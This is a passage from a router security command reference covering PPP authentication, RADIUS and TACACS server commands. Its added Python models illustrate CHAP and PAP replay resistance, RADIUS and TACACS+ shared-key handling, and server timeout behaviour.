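    """Challenger: fresh Identifier and random Challenge value each time; the
    Name field carries the pool alias rather than this router's own hostname."""
    ident = secrets.randbelow(256) if ident is None else ident
    value = os.urandom(16) if value is None else value
    return ident, value, POOL_ALIAS


def chap_answer(ident, value, challenger_name):
    """Caller: pick the secret by the challenger's Name, falling back to the
    common secret for an unknown name, and respond with our own Name."""
    secret = CALLER_USERNAME_DB.get(challenger_name, CALLER_DEFAULT_SECRET)
    return CALLER_HOSTNAME, chap_response(ident, secret, value)


def chap_verify(ident, value, peer_name, response):
    """Challenger: recompute the response with the secret stored for peer_name."""
    secret = POOL_USERNAME_DB.get(peer_name)
    if secret is None:
        return False
    return hmac.compare_digest(chap_response(ident, secret, value), response)


def chap_exchange(ident=None, value=None):
    """One complete Challenge / Response / Success-or-Failure round."""
    ident, value, name = chap_challenge(ident, value)
    peer_name, response = chap_answer(ident, value, name)
    return chap_verify(ident, value, peer_name, response)


def pap_verify(username, password):
    """PAP: the Authenticate-Request carries username and password in the clear."""
    stored = POOL_USERNAME_DB.get(username)
    return stored is not None and hmac.compare_digest(stored, password)


def replay_comparison():
    """What someone sniffing the link can do with a captured authentication."""
    # PAP: the captured request is accepted again, unchanged.
    captured_pap = (CALLER_HOSTNAME, b"S3cret-shared")
    pap_replay_ok = pap_verify(*captured_pap)
    # CHAP: capture one challenge/response pair, then replay the response
    # against the next challenge, which carries a different random value.
    ident, value, name = chap_challenge()
    peer_name, captured_response = chap_answer(ident, value, name)
    ident2, value2, _ = chap_challenge()
    chap_replay_ok = chap_verify(ident2, value2, peer_name, captured_response)
    return pap_replay_ok, chap_replay_ok


if __name__ == "__main__":
    print("CHAP exchange succeeded:", chap_exchange())
    print("(PAP replay accepted, CHAP replay accepted):", replay_comparison())
```

      The caller never needs a username entry per pool member because every member challenges with the same Name; the pool side still keeps one entry per caller, which is where the shared secret actually lives.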
      Related Commands
      aaa authentication ppp
      ppp authentication
      ppp chap hostname
      ppp pap
      [12.5.5] ppp pap sent-username
      To reenable remote PAP support for an interface and use the sent-username and password in the PAP authentication request packet to the peer, use the ppp pap sent-username interface configuration command. Use the no form of this command to disable remote PAP support.
      ppp pap sent-username username password password
      no ppp pap sent-username
      Syntax Description
      username Username sent in the PAP authentication request.
      password Password sent in the PAP authentication request. Must contain from 1 to 25 uppercase and lowercase alphanumeric characters.
      Default
      Remote PAP support disabled.
      Command Mode
      Interface configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.2.
      Use this command to reenable remote PAP support (for example to respond to the peer's request to authenticate with PAP) and to specify the parameters to be used when sending the PAP Authentication Request.
      This is a per-interface command.
      Example
      The commands in the following example identify dialer interface 0 as the dialer rotary group leader and specify PPP as the method of encapsulation used by the interface. Authentication is by CHAP or PAP on received calls only. ISPCorp is the username sent to the peer if the peer requires the router to authenticate with PAP.
      interface dialer0
      encapsulation ppp
      ppp authentication chap pap callin
      ppp chap hostname ISPCorp
      ppp pap sent-username ISPCorp password 7 1123659238
      Related Commands
      aaa authentication ppp
      ppp authentication
      ppp chap hostname
      ppp chap password
      ppp use-tacacs
      [12.5.6] ppp use-tacacs
      To enable TACACS for PPP authentication, use the ppp use-tacacs interface configuration command. Use the no form of the command to disable TACACS for PPP authentication.
      ppp use-tacacs [single-line]
      no ppp use-tacacs
      Note This command is not used in AAA/TACACS+. It has been replaced with the aaa authentication ppp command.
      Syntax Description
      single-line (Optional) Accept the username and password in the username field. This option applies only when using CHAP authentication.
      Default
      TACACS is not used for PPP authentication.
      Command Mode
      Interface configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.3.
      This is a per-interface command. Use this command only when you have set up an extended TACACS server.
      When CHAP authentication is being used, the ppp use-tacacs command with the single-line option specifies that if a username and password are specified in the username, separated by an asterisk (*), a standard TACACS login query is performed using that username and password. If the username does not contain an asterisk, then normal CHAP authentication is performed.
      This feature is useful when integrating TACACS with other authentication systems that require a cleartext version of the user's password. Such systems include one-time password systems, token card systems, and Kerberos.
      Caution Normal CHAP authentications prevent the cleartext password from being transmitted over the link. When you use the single-line option, passwords cross the link as cleartext.
      If the username and password are both carried in the CHAP username field, the CHAP secret is not used by the Cisco IOS software. Because most PPP clients require that a secret be specified, you can use any arbitrary string, and the Cisco IOS software ignores it.
      Examples
      In the following example, asynchronous serial interface 1 is configured to use TACACS for CHAP authentication:
      interface async 1
      ppp authentication chap
      ppp use-tacacs
      In the following example, asynchronous serial interface 1 is configured to use TACACS for PAP authentication:
      interface async 1
      ppp authentication pap
      ppp use-tacacs
      Related Commands
      ppp authentication
      tacacs-server extended
      tacacs-server host
      [12.5.7] radius-server dead-time
      To improve RADIUS response times when some servers might be unavailable, use the radius-server dead-time global configuration command to cause the unavailable servers to be skipped immediately. Use the no form of this command to set dead-time to 0.
      radius-server dead-time minutes
      no radius-server dead-time
      Syntax Description
      minutes Length of time a RADIUS server is skipped over by transaction requests, up to a maximum of 1440 minutes (24 hours).
      Default
      Dead time is set to 0.
      Command Mode
      Global configuration
      Usage Guidelines
      Use this command to cause the Cisco IOS software to mark as "dead" RADIUS servers that fail to respond to authentication requests, thus avoiding the wait for the request to time out before trying the next configured server. A RADIUS server marked as "dead" is skipped by subsequent requests for the configured number of minutes, unless every configured server is marked "dead", in which case the marks are ignored.
      Example
      The following example specifies 5 minutes dead-time for RADIUS servers that fail to respond to authentication requests.
      radius-server dead-time 5
      Related Commands
      radius-server host
      radius-server retransmit
      radius-server timeout
      [12.5.8] radius-server host
      To specify a RADIUS server host, use the radius-server host global configuration command. Use the no form of this command to delete the specified RADIUS host.
      radius-server host {hostname | ip-address} [auth-port port-number] [acct-port port-number]
      no radius-server host {hostname | ip-address}
      Syntax Description
      hostname DNS name of the RADIUS server host.
      ip-address IP address of the RADIUS server host.
      auth-port Specifies the UDP destination port for authentication requests.
      port-number Port number for authentication requests; the host is not used for authentication if set to 0.
      acct-port Specifies the UDP destination port for accounting requests.
      port-number Port number for accounting requests; the host is not used for accounting if set to 0.
      Default
      No RADIUS host is specified.
      Command Mode
      Global configuration
      Usage Guidelines
      You can use multiple radius-server host commands to specify multiple hosts. The software searches for hosts in the order you specify them.
      Example
      The following example specifies host1 as the RADIUS server and uses default ports for both accounting and authentication.
      radius-server host host1.company.com
      The following example specifies port 12 as the destination port for authentication requests and port 16 as the destination port for accounting requests on a RADIUS host named host1:
      radius-server host host1.company.com auth-port 12 acct-port 16
      Note that because entering a line resets all the port numbers, you must specify a host and configure accounting and authentication ports on a single line.
      To use separate servers for accounting and authentication, use the zero port value as appropriate. The following example specifies that RADIUS server host1 be used for accounting but not for authentication, and that RADIUS server host2 be used for authentication but not for accounting:
      radius-server host host1.company.com auth-port 0
      radius-server host host2.company.com acct-port 0
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      aaa accounting †
      aaa authentication
      aaa authorization
      login authentication †
      login tacacs
      ppp†
      ppp authentication
      slip †
      tacacs-server
      username †
      [12.5.9] radius-server key
      Use the radius-server key global configuration command to set the authentication and encryption key for all RADIUS communications between the router and the RADIUS daemon. Use the no form of the command to disable the key.
      radius-server key {string}
      no radius-server key
      Syntax Description
      string The key used for authentication and encryption. This key must match the key configured on the RADIUS daemon.
      Default
      Disabled
      Command Mode
      Global Configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      After enabling AAA authentication with the aaa new-model command, you must set the authentication and encryption key using the radius-server key command.
      Note Specify a RADIUS key after you issue the aaa new-model command.
      The key entered must match the key used on the RADIUS daemon. All leading spaces are ignored, but spaces within and at the end of the key are used. If you use spaces in your key, do not enclose the key in quotation marks unless the quotation marks themselves are part of the key.
      Example
      The following example illustrates how to set the authentication and encryption key to "dare to go":
      radius-server key dare to go
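      The following Python model is an added example, not part of the Cisco documentation or of any RADIUS implementation; it shows what the radius-server key shared secret actually does on the wire, following RFC 2865. The NAS hides the User-Password attribute with MD5(secret || Request Authenticator), and the server signs its reply with a Response Authenticator keyed by the same secret, which the NAS verifies before trusting the answer. The ios_key helper applies the whitespace rule quoted above so that the leading-space and trailing-space cases can be tried side by side. User names, passwords and keys are constructed for the example.

```python
"""Added example: RADIUS shared secret in User-Password hiding and Response Authenticator."""
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
ATTR_USER_NAME, ATTR_USER_PASSWORD = 1, 2


def ios_key(configured):
    """Whitespace rule quoted above: leading spaces are dropped, spaces inside
    and at the end of the key are part of it."""
    return configured.lstrip(" ").encode()


def _xor_chain(data, secret, req_auth, chain_on_output):
    """RFC 2865 section 5.2: XOR each 16-byte block with MD5(secret || previous
    block), the first block keyed by the Request Authenticator. Hiding chains on
    the produced block, revealing chains on the received block."""
    out, prev = b"", req_auth
    for i in range(0, len(data), 16):
        block = data[i:i + 16]
        pad = hashlib.md5(secret + prev).digest()
        result = bytes(x ^ y for x, y in zip(block, pad))
        out += result
        prev = result if chain_on_output else block
    return out


def hide_password(password, secret, req_auth):
    padded = password + b"\x00" * (-len(password) % 16 or (16 if not password else 0))
    return _xor_chain(padded, secret, req_auth, chain_on_output=True)


def reveal_password(hidden, secret, req_auth):
    return _xor_chain(hidden, secret, req_auth, chain_on_output=False).rstrip(b"\x00")


def encode_attrs(pairs):
    return b"".join(struct.pack("!BB", t, len(v) + 2) + v for t, v in pairs)


def decode_attrs(data):
    attrs, i = {}, 0
    while i < len(data):
        t, length = data[i], data[i + 1]
        attrs[t] = data[i + 2:i + length]
        i += length
    return attrs


def packet(code, ident, authenticator, attrs):
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs


def response_authenticator(code, ident, req_auth, attrs, secret):
    """MD5(Code || ID || Length || RequestAuth || Attributes || Secret)."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return hashlib.md5(header + req_auth + attrs + secret).digest()


def nas_access_request(user, password, secret, ident=1, req_auth=None):
    req_auth = req_auth or os.urandom(16)
    attrs = encode_attrs([(ATTR_USER_NAME, user),
                          (ATTR_USER_PASSWORD, hide_password(password, secret, req_auth))])
    return packet(ACCESS_REQUEST, ident, req_auth, attrs)


def server_reply(request, secret, userdb):
    """RADIUS server: unhide the password with its own key and answer. A key
    mismatch turns the password into noise, so the login is rejected."""
    _, ident, length = struct.unpack("!BBH", request[:4])
    req_auth, attrs = request[4:20], decode_attrs(request[20:length])
    user = attrs[ATTR_USER_NAME].decode(errors="replace")
    password = reveal_password(attrs[ATTR_USER_PASSWORD], secret, req_auth)
    code = ACCESS_ACCEPT if userdb.get(user) == password else ACCESS_REJECT
    return packet(code, ident, response_authenticator(code, ident, req_auth, b"", secret), b"")


def nas_check_reply(request, reply, secret):
    """NAS: trust the reply only if its identifier matches and its Response
    Authenticator verifies under our copy of the key."""
    code, ident, _ = struct.unpack("!BBH", reply[:4])
    if ident != request[1]:
        return "discard (identifier mismatch)"
    expected = response_authenticator(code, ident, request[4:20], reply[20:], secret)
    if not hmac.compare_digest(expected, reply[4:20]):
        return "discard (authenticator mismatch: wrong key or forged reply)"
    return "accept" if code == ACCESS_ACCEPT else "reject"


def login(nas_key, server_key, user=b"alice", password=b"hunter2"):
    """One Access-Request / reply round; the user database is constructed."""
    request = nas_access_request(user, password, nas_key)
    reply = server_reply(request, server_key, {"alice": b"hunter2"})
    return nas_check_reply(request, reply, nas_key)


if __name__ == "__main__":
    print(login(ios_key("dare to go"), ios_key("dare to go")))    # accept
    print(login(ios_key("  dare to go"), ios_key("dare to go")))  # accept: leading spaces ignored
    print(login(ios_key("dare to go "), ios_key("dare to go")))   # discard: trailing space is part of the key
```

      A mismatched key therefore fails twice: the server sees a wrong password, and the NAS cannot verify the reply it gets back. Only the password attribute is hidden; the rest of the request, including the user name, crosses the network in the clear.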
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      login authentication †
      login tacacs
      ppp †
      ppp authentication
      slip †
      tacacs-server
      username †
      [12.6.0] radius-server retransmit
      To specify the number of times the Cisco IOS software searches the list of RADIUS server hosts before giving up, use the radius-server retransmit global configuration command. Use the no form of this command to disable retransmission.
      radius-server retransmit retries
      no radius-server retransmit
      Syntax Description
      retries Maximum number of retransmission attempts.
      Default
      Three retries
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      The Cisco IOS software tries all servers, allowing each one to time out before increasing the retransmit count.
      Example
      The following example specifies a retransmit counter value of five times:
      radius-server retransmit 5
      radius-server timeout
      To set the interval a router waits for a server host to reply, use the radius-server timeout global configuration command. Use the no form of this command to restore the default.
      radius-server timeout seconds
      no radius-server timeout
      Syntax Description
      seconds Integer that specifies the timeout interval in seconds.
      Default
      5 seconds
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      Example
      The following example changes the interval timer to 10 seconds:
      radius-server timeout 10
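      The following Python model is an added example, not part of the Cisco documentation; it shows how radius-server timeout, radius-server retransmit and radius-server dead-time combine into the time a login waits when servers are down. It follows the rules stated in those three sections: every server is tried and allowed to time out before the retransmit count goes up, a server that fails to answer is marked dead for dead-time minutes and skipped, and the marks are ignored when every server is dead. Two details are assumptions of this model rather than statements from the page: retransmit N is read as the first try plus N retries, and a server is marked dead after its first timeout. The server names are constructed.

```python
"""Added example: model of RADIUS timeout, retransmit and dead-time interaction."""
from dataclasses import dataclass


@dataclass
class Server:
    name: str
    reachable: bool
    dead_until: float = 0.0        # model clock (seconds) at which the dead mark expires


@dataclass
class RadiusClient:
    servers: list
    timeout: int = 5               # radius-server timeout    (seconds, default 5)
    retransmit: int = 3            # radius-server retransmit (retries, default 3)
    dead_time: int = 0             # radius-server dead-time  (minutes, default 0 = off)

    def candidates(self, now):
        live = [s for s in self.servers if s.dead_until <= now]
        return live or list(self.servers)   # all dead: ignore the marks rather than fail outright

    def authenticate(self, now):
        """Return (name of the server that answered or None, seconds spent waiting)."""
        waited = 0
        cands = self.candidates(now)
        for _ in range(self.retransmit + 1):          # assumption: first try + N retries
            for s in cands:
                if s.reachable:
                    return s.name, waited
                waited += self.timeout                 # one full timeout per silent server
                if self.dead_time:                     # assumption: marked dead on first timeout
                    s.dead_until = now + self.dead_time * 60
        return None, waited

    def worst_case_wait(self):
        """Upper bound on one login's wait with every server silent and no dead marks."""
        return len(self.servers) * self.timeout * (self.retransmit + 1)


def demo():
    """Two servers, the first one down: back-to-back logins with and without dead-time."""
    without = RadiusClient([Server("rad1", False), Server("rad2", True)])
    with_dt = RadiusClient([Server("rad1", False), Server("rad2", True)], dead_time=5)
    return {
        "no dead-time": [without.authenticate(0), without.authenticate(60)],
        "dead-time 5": [with_dt.authenticate(0), with_dt.authenticate(60), with_dt.authenticate(400)],
    }


if __name__ == "__main__":
    for label, results in demo().items():
        print(label, results)
    all_down = RadiusClient([Server("rad1", False), Server("rad2", False)])
    print("worst case with all servers down:", all_down.worst_case_wait(), "s")
```

      With the defaults, two silent servers hold a login for 2 x 5 x 4 = 40 seconds before AAA moves to the next method in the list; with dead-time set, only the first login after an outage pays the timeout, and later ones skip the dead server until the mark expires.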
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      login authentication †
      login tacacs
      ppp †
      ppp authentication †
      slip †
      tacacs-server †
      username †
      [12.6.1] show kerberos creds
      Use the show kerberos creds EXEC command to display the contents of your credentials cache.
      show kerberos creds
      Syntax Description
      This command has no keywords or arguments.
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      The show kerberos creds command is equivalent to the UNIX klist command.
      When users authenticate themselves with Kerberos, they are issued an authentication ticket called a credential. The credential is stored in a credential cache.
      Sample Displays
      In the following example, the entries in the credentials cache are displayed:
      Router> show kerberos creds
      Default Principal: chet@cisco.com
      Valid Starting Expires Service Principal
      18-Dec-1995 16:21:07 19-Dec-1995 00:22:24 krbtgt/CISCO.COM@CISCO.COM
      In the following example, output is returned that acknowledges that credentials do not exist in the credentials cache:
      Router> show kerberos creds
      No Kerberos credentials
      Related Command
      clear kerberos creds
      [12.6.2] show privilege
      To display your current level of privilege, use the show privilege EXEC command.
      show privilege
      Syntax Description
      This command has no arguments or keywords.
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.3.
      Sample Display
      The following is sample output from the show privilege command. The current privilege level is 15.
      Router# show privilege
      Current privilege level is 15
      Related Command
      A dagger (†) indicates that the command is documented outside this chapter.
      enable password †
      [12.6.3] tacacs-server key
      Use the tacacs-server key global configuration command to set the authentication encryption key used for all TACACS+ communications between the access server and the TACACS+ daemon. Use the no form of the command to disable the key.
      tacacs-server key key
      no tacacs-server key [key]
      Syntax Description
      key Key used to set authentication and encryption. This key must match the key used on the TACACS+ daemon.
      Command Mode
      Global Configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      After enabling AAA with the aaa new-model command, you must set the authentication and encryption key using the tacacs-server key command.
      The key entered must match the key used on the TACACS+ daemon. All leading spaces are ignored; spaces within and at the end of the key are not. If you use spaces in your key, do not enclose the key in quotation marks unless the quotation marks themselves are part of the key.
      Example
      The following example illustrates how to set the authentication and encryption key to "dare to go":
      tacacs-server key dare to go
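      The following Python model is an added example, not part of the Cisco documentation or of any TACACS+ implementation; it shows how the tacacs-server key is used on the wire, following the TACACS+ protocol as specified in RFC 8907. The packet body is XORed with an MD5 keystream derived from the session id, the key, the version and the sequence number, while the header stays in the clear. A key mismatch is not reported as an error: the receiver simply gets noise, and nothing in the packet authenticates the body, which is why the RFC calls this obfuscation rather than encryption. The session id, user, port and key values are constructed for the example.

```python
"""Added example: TACACS+ body obfuscation keyed by the shared key (RFC 8907 section 4.5)."""
import hashlib
import struct

TAC_PLUS_VERSION = 0xC0            # major version 0xC, minor version 0
TAC_PLUS_AUTHEN = 0x01             # packet type: authentication
TAC_PLUS_UNENCRYPTED_FLAG = 0x01
HEADER = "!BBBB4sI"                # version, type, seq_no, flags, session_id, length


def tacacs_key(configured):
    """Whitespace rule quoted above: leading spaces ignored, inner and trailing spaces kept."""
    return configured.lstrip(" ").encode()


def pseudo_pad(session_id, key, version, seq_no, length):
    """MD5_1 = MD5(session_id || key || version || seq_no);
    MD5_n = MD5(session_id || key || version || seq_no || MD5_{n-1}); concatenate, truncate."""
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(session_id + key + bytes([version, seq_no]) + prev).digest()
        pad += prev
    return pad[:length]


def obfuscate(body, session_id, key, version, seq_no):
    """Body XOR keystream; applying it a second time restores the body."""
    pad = pseudo_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def authen_start_body(user, port, rem_addr, data=b"",
                      action=1, priv_lvl=1, authen_type=1, service=1):
    """Authentication START body: eight one-byte fields, then the variable fields.
    Defaults: action LOGIN, priv_lvl 1, authen_type ASCII, service LOGIN."""
    fixed = struct.pack("!8B", action, priv_lvl, authen_type, service,
                        len(user), len(port), len(rem_addr), len(data))
    return fixed + user + port + rem_addr + data


def build_packet(body, session_id, key, seq_no=1, unencrypted=False):
    """Sender side: header in the clear, body obfuscated unless the flag says otherwise."""
    flags = TAC_PLUS_UNENCRYPTED_FLAG if unencrypted else 0
    payload = body if unencrypted else obfuscate(body, session_id, key, TAC_PLUS_VERSION, seq_no)
    header = struct.pack(HEADER, TAC_PLUS_VERSION, TAC_PLUS_AUTHEN, seq_no, flags, session_id, len(body))
    return header + payload


def parse_body(packet, key):
    """Receiver side: the cleartext header supplies the session id and seq_no for the pad."""
    version, _type, seq_no, flags, session_id, length = struct.unpack(HEADER, packet[:12])
    payload = packet[12:12 + length]
    if flags & TAC_PLUS_UNENCRYPTED_FLAG:
        return payload
    return obfuscate(payload, session_id, key, version, seq_no)


def start_user(packet, key):
    """Pull the user field out of a START body. With the wrong key the length
    bytes are keystream noise, so this returns garbage rather than failing."""
    body = parse_body(packet, key)
    user_len = body[4]
    return body[8:8 + user_len]


# Constructed sample exchange: an ASCII login for user "admin" from port tty1.
SESSION_ID = b"\x1a\x2b\x3c\x4d"
START_BODY = authen_start_body(b"admin", b"tty1", b"10.0.0.5")
START_PACKET = build_packet(START_BODY, SESSION_ID, tacacs_key("dare to go"))

if __name__ == "__main__":
    print("right key :", start_user(START_PACKET, tacacs_key("dare to go")))
    print("wrong key :", start_user(START_PACKET, tacacs_key("dare to go ")))
    print("header in clear:", START_PACKET[:12].hex())
```

      Because the keystream depends only on values visible in the header plus the key, every router that shares a key with the daemon can read every other router's sessions to it; the per-host key option of tacacs-server host is the way to narrow that.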
      Related Commands
      aaa new-model
      tacacs-server host
      [12.6.4] tacacs-server login-timeout
      To specify how long the system will wait for login input (such as username and password) before timing out, use the tacacs-server login-timeout global configuration command. Use the no form of this command to restore the default value of 30 seconds.
      tacacs-server login-timeout seconds
      no tacacs-server login-timeout seconds
      Syntax Description
      seconds Integer that determines the number of seconds the system will wait for login input before timing out. Available settings are from 1 to 300 seconds.
      Default
      The default login timeout value is 30 seconds.
      Command Mode
      Global configuration
      Usage Guidelines
      With aaa new-model enabled, the default login timeout value is 30 seconds. The tacacs-server login-timeout command lets you change this timeout value from 1 to 300 seconds. To restore the default login timeout value of 30 seconds, use the no tacacs-server login-timeout command.
      Example
      The following example changes the login timeout value to 60 seconds:
      tacacs-server login-timeout 60
      [12.6.5] tacacs-server authenticate
      To configure the Cisco IOS software to indicate whether a user can perform an attempted action under TACACS and extended TACACS, use the tacacs-server authenticate global configuration command.
      tacacs-server authenticate {connection [always] | enable | slip [always] [access-lists]}
      Syntax Description
      connection Configures a required response when a user makes a TCP connection.
      enable Configures a required response when a user enters the enable command.
      slip Configures a required response when a user starts a SLIP or PPP session.
      always (Optional) Performs authentication even when a user is not logged in. This option only applies to the slip keyword.
      access-lists (Optional) Requests and installs access lists. This option only applies to the slip keyword.
      Command Mode
      Global configuration
      Usage Guidelines
      The tacacs-server authenticate {connection | enable} command first appeared in Cisco IOS Release 10.0. The tacacs-server authenticate {connection [always] | enable | slip [always] [access-lists]} form first appeared in Cisco IOS Release 10.3.
      Enter one of the keywords to specify the action (when a user enters enable mode, for example).
      Before you use the tacacs-server authenticate command, you must enable the tacacs-server extended command.
      Note This command is not used in AAA/TACACS+. It has been replaced by the aaa authorization command.
      Example
      The following example requires a TACACS response before a logged-in user may open an outgoing Telnet or rlogin connection:
      tacacs-server authenticate connection
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      enable secret †
      enable use-tacacs
      [12.6.6] tacacs-server directed-request
      To send only a username to a specified server when a direct request is issued, use the tacacs-server directed-request global configuration command. Use the no form of this command to disable the direct-request feature.
      tacacs-server directed-request
      no tacacs-server directed-request
      Syntax Description
      This command has no arguments or keywords.
      Default
      Enabled
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 11.1.
      This command sends only the portion of the username before the "@" symbol to the host specified after the "@" symbol. In other words, with the directed-request feature enabled, you can direct a request to any of the configured servers, and only the username is sent to the specified server.
      Disabling tacacs-server directed-request causes the whole string, both before and after the "@" symbol, to be sent to the default tacacs server. When the directed-request feature is disabled, the router queries the list of servers, starting with the first one in the list, sending the whole string, and accepting the first response that it gets from the server. The tacacs-server directed-request command is useful for sites that have developed their own TACACS server software that parses the whole string and makes decisions based on it.
      With tacacs-server directed-request enabled, only configured TACACS servers can be specified by the user after the "@" symbol. If the host name specified by the user does not match the IP address of a TACACS server configured by the administrator, the user input is rejected.
      Use no tacacs-server directed-request to disable the ability of the user to choose between configured TACACS servers and to cause the entire string to be passed to the default server.
      Example
      The following example disables tacacs-server directed-request so that the entire user input, including anything after the "@" symbol, is passed to the default TACACS server:
      no tacacs-server directed-request
      tacacs-server extended
      To enable an extended TACACS mode, use the tacacs-server extended global configuration command. Use the no form of this command to disable the mode.
      tacacs-server extended
      no tacacs-server extended
      Syntax Description
      This command has no arguments or keywords.
      Default
      Disabled
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      This command initializes extended TACACS. To initialize AAA/TACACS+, use the aaa new-model command.
      Example
      The following example enables extended TACACS mode:
      tacacs-server extended
      tacacs-server host
      To specify a TACACS host, use the tacacs-server host global configuration command. Use the no form of this command to delete the specified name or address.
      tacacs-server host hostname [single-connection] [port integer] [timeout integer] [key string]
      no tacacs-server host hostname
      Syntax Description
      hostname Name or IP address of the host.
      single-connection Specify that the router maintain a single open connection for confirmation from a AAA/TACACS+ server (CiscoSecure Release 1.0.1 or later). This option has no autodetect and fails if the specified host is not running a CiscoSecure daemon.
      port Specify a server port number.
      integer Port number of the server (in the range 1 to 10,000).
      timeout Specify a timeout value. This overrides the global timeout value set with the tacacs-server timeout command for this server only.
      integer Integer value, in seconds, of the timeout interval.
      key Specify an authentication and encryption key. This must match the key used by the TACACS+ daemon. Specifying this key overrides the key set by the global command tacacs-server key for this server only.
      string Character string specifying authentication and encryption key.
      Default
      No TACACS host is specified.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      You can use multiple tacacs-server host commands to specify additional hosts. The Cisco IOS software searches for hosts in the order in which you specify them. Use the single-connection, port, timeout, and key options only when running a AAA/TACACS+ server.
      Because the timeout and key parameters of the tacacs-server host command override the global settings made by the tacacs-server timeout and tacacs-server key commands, you can give each server its own key and timeout, so that a key exposed for one server does not unlock the others.
      Examples
      The following example specifies a TACACS host named Sea_Change:
      tacacs-server host Sea_Change
      The following example specifies that, for AAA confirmation, the router consult the CiscoSecure TACACS+ host named Sea_Cure on port number 51. The timeout value for requests on this connection is 3 seconds; the encryption key is a_secret.
      tacacs-server host Sea_Cure single-connection port 51 timeout 3 key a_secret
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      login tacacs
      ppp †
      slip †
      tacacs-server key
      tacacs-server timeout
      [12.6.8] tacacs-server last-resort
      To cause the network access server, when no TACACS server responds, to request the privileged password as verification or to allow successful login without further input from the user, use the tacacs-server last-resort global configuration command. Use the no tacacs-server last-resort command to restore the system to the default behavior.
      tacacs-server last-resort {password | succeed}
      no tacacs-server last-resort {password | succeed}
      Syntax Description
      password Allows the user to access the EXEC command mode by entering the password set by the enable command.
      succeed Allows the user to access the EXEC command mode without further question.
      Default
      If the TACACS server does not respond, the default action is to deny the request.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      Use the tacacs-server last-resort command to be sure that login can occur; for example, when a systems administrator needs to log in to troubleshoot TACACS servers that might be down. Note that both keywords make login fail open while the server is unreachable: succeed admits anyone who can reach the line with no credential at all, and password reduces the check to the enable password, so an attacker who can make the TACACS server unreachable gets in on those terms.
      Note This command is not used in AAA/TACACS+.
      Example
      The following example forces successful login:
      tacacs-server last-resort succeed
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter.
      enable password †
      login (EXEC) †
      [12.6.9] tacacs-server notify
      Use the tacacs-server notify global configuration command to cause a message to be transmitted to the TACACS server, with retransmission being performed by a background process for up to 5 minutes. Use the no form of this command to disable notification.
      tacacs-server notify {connection [always] | enable | logout [always] | slip [always]}
      no tacacs-server notify
      Syntax Description
      connection Specifies that a message be transmitted when a user makes a TCP connection.
      always (Optional) Sends a message even when a user is not logged in. This option applies only to SLIP or PPP sessions and can be used with the logout or slip keywords.
      enable Specifies that a message be transmitted when a user enters the enable command.
      logout Specifies that a message be transmitted when a user logs out.
      slip Specifies that a message be transmitted when a user starts a SLIP or PPP session.
      Default
      No message is transmitted to the TACACS server.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0. The always and slip commands first appeared in Cisco IOS Release 11.0.
      The terminal user receives an immediate response, allowing access to the feature specified. Enter one of the keywords to specify notification of the TACACS server upon receipt of the corresponding action (when user logs out, for example).
      Note This command is not used in AAA/TACACS+. It has been replaced by the aaa accounting suite of commands.
      Example
      The following example sets up notification of the TACACS server when a user logs out:
      tacacs-server notify logout
      [12.7.0] tacacs-server optional-passwords
      To specify that the first TACACS request to a TACACS server be made without password verification, use the tacacs-server optional-passwords global configuration command. Use the no form of this command to restore the default.
      tacacs-server optional-passwords
      no tacacs-server optional-passwords
      Syntax Description
      This command has no arguments or keywords.
      Default
      Disabled
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      When the user enters the login name, the login request is transmitted with the name and a zero-length password. If accepted, the login procedure completes. If the TACACS server refuses this request, the access server prompts for a password and tries again when the user supplies one. The TACACS server must support authentication for users without passwords to make use of this feature. This feature supports all TACACS requests (login, SLIP, enable, and so on).
      Note This command is not used by AAA/TACACS+.
      Example
      The following example configures the first login to not require TACACS verification:
      tacacs-server optional-passwords
      [12.7.1] tacacs-server retransmit
      To specify the number of times the Cisco IOS software searches the list of TACACS server hosts before giving up, use the tacacs-server retransmit global configuration command. Use the no form of this command to disable retransmission.
      tacacs-server retransmit retries
      no tacacs-server retransmit
      Syntax Description
      retries Integer that specifies the retransmit count.
      Default
      Two retries
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      The Cisco IOS software will try all servers, allowing each one to time out before increasing the retransmit count.
      Example
      The following example specifies a retransmit counter value of five times:
      tacacs-server retransmit 5
      [12.7.2] tacacs-server timeout
      To set the interval that the router waits for a TACACS server host to reply, use the tacacs-server timeout global configuration command. Use the no form of this command to restore the default.
      tacacs-server timeout seconds
      no tacacs-server timeout
      Syntax Description
      seconds Integer that specifies the timeout interval in seconds (between 1 and 300).
      Default
      5 seconds
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      Example
      The following example changes the interval timer to 10 seconds:
      tacacs-server timeout 10
      Related Command
      tacacs-server host
      [12.7.3] Traffic Filter Commands
      This chapter describes the commands used to configure Lock-and-key security (IP only).
